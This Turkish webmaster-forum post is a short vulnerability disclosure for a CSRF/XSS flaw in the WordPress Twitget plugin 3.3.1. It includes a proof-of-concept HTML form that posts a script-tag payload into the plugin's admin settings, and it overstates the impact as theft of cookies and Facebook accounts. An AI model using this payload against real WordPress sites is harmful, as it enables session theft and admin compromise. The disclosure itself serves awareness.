İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Wordpress Twitget Plugin 3.3.1 Açığı

C.A

0
İyinet Üyesi
Katılım
25 Nisan 2014
Mesajlar
999
Reaction score
0
Konum
İzmir
Açık CSRF/XSS vulnerability dediğimiz yani kısaca cookie çalma ve kullanıcının her türlü bilgisini ele geçirme (facebook ve diğer hesaplarda dahil) yetkisine sahip olunabilir.

PHP:
<form action=\"http://localhost/wp-admin/options-general.php?page=twitget/twitget.php\" method=\"POST\">
  <input type=\"text\" name=\"twitget_username\" value=\"john_smith\">
  <input type=\"text\" name=\"twitget_consumer_key\" value=\""><script>alert(\'dxw\')</script>\">
  <input type=\"submit\">
</form>

javascript alert yöntemi ile hata alınabilir ve işlemler devam edilebilir nitelikte.

Hatanın kapatılması: Hatayı kapatabilmeniz için yeni çıkan sürümü ile birlikte sayfa ayarlarınızı yada sitenizi ziyaretçilere kapatarak sadece üyelerin erişebilirliğini sağlayabilirsiniz.
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst